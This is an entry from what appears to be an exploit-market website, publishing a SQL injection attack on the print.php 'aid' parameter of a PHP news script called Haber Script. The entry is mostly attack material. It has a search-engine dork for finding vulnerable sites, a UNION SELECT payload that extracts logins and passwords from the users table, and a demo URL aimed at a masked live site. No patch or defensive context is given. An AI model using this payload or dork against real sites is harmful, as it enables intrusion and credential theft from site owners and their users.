[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Haber Script ( print.php ) SQL Injection Vulnerability

Author
Emre5807
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12084
Category
web applications
Date add
01-05-2010
Platform
php
===========================================================
Haber Script ( print.php?aid= ) SQL Injection Vulnerability 
===========================================================

###########################

Author : Emre5807

Homepage : http://www.1923turk.com

Script : Haber Script


###########################

[ Vulnerable File ]


Site.com/print.php?aid= [ SQL ]


[ Dork ]

inurl:/print.php?aid=


[ Exploit ]

+union+select+1,2,group_concat(login,7,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users


[ Demo]

http://xxxxx.com/print.php?aid=-5249+union+select+1,2,group_concat(login,7,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17

,18+from+users



#  0day.today [2024-12-25]  #